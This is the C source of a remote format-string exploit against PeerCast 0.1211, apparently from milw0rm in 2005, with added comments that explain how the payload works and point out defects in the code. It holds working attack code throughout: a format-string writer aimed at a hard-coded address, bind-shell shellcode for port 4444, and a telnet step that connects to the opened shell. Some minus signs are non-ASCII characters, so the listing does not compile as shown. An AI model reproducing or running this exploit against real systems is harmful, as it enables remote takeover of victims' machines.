
PeerCast 0.1211 Remote Format String Exploit

  1    /*
  2    \               PeerCast <= 0.1211 remote format string exploit
  3    /                            [<< Public Release >>]
  4    \
  5    / by Darkeagle [ darkeagle [at] linkin−park [dot] cc ]
  6    \
  7    /       uKt researcherz [ http://unl0ck.org ]
  8    \
  9    / greetz goes to: uKt researcherz.
  10   \
  11   /
  12   \ − smallest code − better code!!!
  13   /
  14   */
  15
  16   #include   <stdio.h>
  17   #include   <stdlib.h>
  18   #include   <stdarg.h>
  19   #include   <string.h>
  20   #include   <sys/types.h>
  21   #include   <sys/socket.h>
  22   #include   <netinet/in.h>
  23   #include   <arpa/inet.h>
  24   #include   <unistd.h>
  25   #include   <netdb.h>
  26
  27
  28   //*******************************************
  29   #define doit( b0, b1, b2, b3, addr ) { \
  30                b0 = (addr >> 24) & 0xff; \
  31                b1 = (addr >> 16) & 0xff; \
  32                b2 = (addr >> 8) & 0xff; \
  33                b3 = (addr      ) & 0xff; \
  34   }
       /*
        * doit() splits the 32-bit value `addr` into its four bytes:
        * b0 receives the most significant byte, b3 the least significant.
        * `addr` is evaluated four times, so it must be side-effect free.
        * The body is a bare `{ }` block rather than the usual
        * `do { ... } while (0)`, so the trailing ';' at each call site is an
        * empty statement; harmless here, but it would break an if/else use.
        */
  35   //*******************************************
  36
  37
  38
  39   //****************************************************************
  40   char shellcode[] = // binds 4444 port
       /*
        * Opaque machine-code blob supplied by the author (presumably 32-bit x86,
        * given the 4-byte addresses used elsewhere in the file — not verified here).
        * The author's comment claims it opens a listener on port 4444; main()
        * relies on that claim when it later runs `telnet HOST 4444`.  The blob is
        * appended verbatim to the HTTP request built in main(), so every byte of
        * it is sent over the wire as part of the request line.
        */
  41   "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
  42   "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
  43   "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
  44   "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
  45   "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
  46   "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
  47   "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
  48   //****************************************************************
  49
  50
  51   //****************************
  52   #define HOST "127.0.0.1"   /* target address; hard-coded, also interpolated into the telnet command in main() */
  53    #define PORT 7144            /* TCP port the GET request is sent to */
  54    #define GOTADDR 0x0809da9c   /* address whose bytes main() embeds in the request (the name suggests a GOT slot; build-specific, not verifiable from this listing) */
  55    #define SHELLADDR 0x49adb23c /* value evil_builder() arranges to be written there (build-specific) */
  56    //****************************
  57
  58
  59
  60    //****************************************************************************************
  61   char *
  62   evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
  63   {
         /*
          * Builds the format-string part of the request sent by main(): four
          * "%<width>x%<pos>$n" pairs.  Each "%<width>x" pads the target's output so
          * its running byte count reaches the next byte of `retaddr`, and the
          * following "%<pos>$n" stores that count through positional parameter
          * `offset`, `offset+1`, `offset+2`, `offset+3`.  Positional "$" parameters
          * are a POSIX extension, not plain C99.
          *
          * retaddr : 32-bit value whose four bytes are written, low byte first
          * offset  : index of the first positional parameter to write through
          * base    : subtracted from the first width only (main() passes 4)
          * figure  : subtracted from every byte before widths are computed
          *           (main() passes 0x10); the subtraction wraps in unsigned char
          * Returns a 999-byte malloc'd buffer owned by the caller; main() never
          * frees it.  The malloc() result is not checked for NULL.
          */
  64     char * buf;
  65     unsigned char b0, b1, b2, b3;
  66     int start = 256;   /* floor added to every width so the widths stay positive for small `base` */
  67
  68     doit( b0, b1, b2, b3, retaddr );   /* b0 = most significant byte ... b3 = least */
  69     buf = (char *)malloc(999);         /* unchecked: a NULL result is dereferenced by memset() below */
  70     memset( buf, 0, 999 );             /* the zeroed tail also terminates the string after main() appends filler */
  71
        /* NOTE: in this listing the minus signs below are U+2212, not ASCII '-';
         * the text will not compile until they are corrected. */
  72    b3   −=   figure;   /* unsigned char arithmetic: wraps modulo 256 */
  73    b2   −=   figure;
  74    b1   −=   figure;
  75    b0   −=   figure;
  76
        /* Widths are the differences between successive bytes plus `start`, so the
         * cumulative count reaches each byte in turn; the first width also
         * subtracts the 16 bytes already emitted earlier in the request and `base`. */
  77    snprintf( buf, 999,
  78              "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
  79                b3 − 16 + start − base, offset,
  80                b2 − b3 + start, offset + 1,
  81                b1 − b2 + start, offset + 2,
  82                b0 − b1 + start, offset + 3 );
  83
  84     return buf;
  85   }
  86    //****************************************************************************************
  87
  88
  89
  90
  91    //****************************************************************************************
  92    int
  93    main( int argc, char * argv[] )
  94    {
        /*
         * Entry point.  argc/argv are unused: target host, port and both addresses
         * are compile-time constants (HOST, PORT, GOTADDR, SHELLADDR).
         *
         * Builds one HTTP request "GET /html/en/index.html" whose path is followed
         * by four little-endian 4-byte addresses (GOTADDR, +1, +2, +3), the
         * format-string payload from evil_builder(), 32 filler bytes of 0x55 and
         * the `shellcode` blob, sends it to HOST:PORT, then runs
         * `telnet HOST 4444` through system().
         *
         * Defender's note: on the wire this is a single GET whose request line
         * carries raw binary bytes and repeated "%<n>x%<n>$n" conversions — the
         * usual web-log signature of a format-string attack against an HTTP
         * listener.  Return value is always 0, even when the connection fails.
         */
  95      struct sockaddr_in addr;
  96      int sock;
  97      char * fmt;                                   /* heap buffer from evil_builder(); never freed */
  98      char endian[31337], da_shell[31337];          /* request buffer and telnet command line */
  99      unsigned long locaddr, retaddr;
  100     unsigned int offset, base;
  101     unsigned char b0, b1, b2, b3;
  102
  103    system("clear");                               /* cosmetic; spawns a shell just to clear the screen */
  104    printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
  105    printf("*^*^*^             by Darkeagle             ^*^*^*\n");
  106    printf("*^*^*^     uKt researcherz [ http://unl0ck.org ]  ^*^*^*\n\n");
  107
  108    memset( endian, 0x00, 31337 );
  109    memset( da_shell, 0x00, 31337 );
  110
  111    addr.sin_family = AF_INET;
  112    addr.sin_port = htons(PORT);
  113    addr.sin_addr.s_addr = inet_addr(HOST);         /* inet_addr() failure (INADDR_NONE) is not checked */
  114
  115    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); /* return value not checked; -1 would reach connect() */
  116
  117    locaddr = GOTADDR;
  118    retaddr = SHELLADDR;
  119    offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141
                        /* author-determined positional index for this build; see the author's note above */
  120
  121    doit( b0, b1, b2, b3, locaddr );                /* b3 = low byte of GOTADDR */
  122
  123    base = 4;
  124    printf("[*] Buildin’ evil code\n");
  125    strcat(endian, "GET /html/en/index.html");
        /* Four addresses, each emitted low byte first (little-endian): GOTADDR,
         * GOTADDR+1, +2, +3.  `b3 + 1` is int-promoted; "%c" keeps its low byte.
         * NOTE: the size argument is sizeof(endian) although the destination
         * starts at endian+strlen(endian), so the bound overstates the remaining
         * room by the prefix length — harmless for 16 bytes in a 31337-byte
         * buffer, but the correct bound is sizeof(endian) - strlen(endian). */
  126    snprintf( endian+strlen(endian), sizeof(endian),
  127               "%c%c%c%c"
  128               "%c%c%c%c"
  129               "%c%c%c%c"
  130               "%c%c%c%c",
  131                 b3, b2, b1, b0,
  132                 b3 + 1, b2, b1, b0,
  133                 b3 + 2, b2, b1, b0,
  134                 b3 + 3, b2, b1, b0 );
  135
  136   fmt = evil_builder( retaddr, offset, base, 0x10 );   /* may return NULL on malloc failure; not checked */
  137
        /* 32 bytes of 0x55 filler then the shellcode, appended into the 999-byte
         * malloc'd buffer with no remaining-room check; NUL termination after the
         * filler relies on evil_builder() having zero-filled the buffer. */
  138   memset(fmt+strlen(fmt), 0x55, 32);
  139   strcat(fmt, shellcode);
  140   strcat(endian, fmt);                            /* unbounded, but endian is far larger than fmt */
  141   strcat(endian, "\r\n\r\n\r\n");                  /* terminates the HTTP request */
  142   printf("[+] Buildin’ complete!\n");
  143   sprintf(da_shell, "telnet %s 4444", HOST);      /* HOST is a compile-time literal, so no injection surface here */
  144
  145   // just go, y0!
  146   printf("[*] Connectin’\n");
                                                        /* exit(0) on failure reports success to the calling shell */
  147   if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[−] Connection failed!\n\n"); exit(0); }
  148
  149   printf("[+] Connected!\n");
  150   printf("[*] Sleepin’\n");
  151   sleep(1);
  152
  153   printf("[*] Sendin’\n");
  154   send(sock, endian, strlen(endian), 0);          /* return value (short send / error) not checked */
  155
  156   printf("[*] Sleepin’\n");
  157    sleep(1);
  158
  159    printf("[*] Connectin’ in da shell\n\n");
  160    sleep(1);
  161    system(da_shell);                               /* assumes the shellcode's port-4444 listener is up; sock is never closed */
  162    return 0;
  163   }
  164   //****************************************************************************************
  165
  166   // milw0rm.com [2005−06−20]





				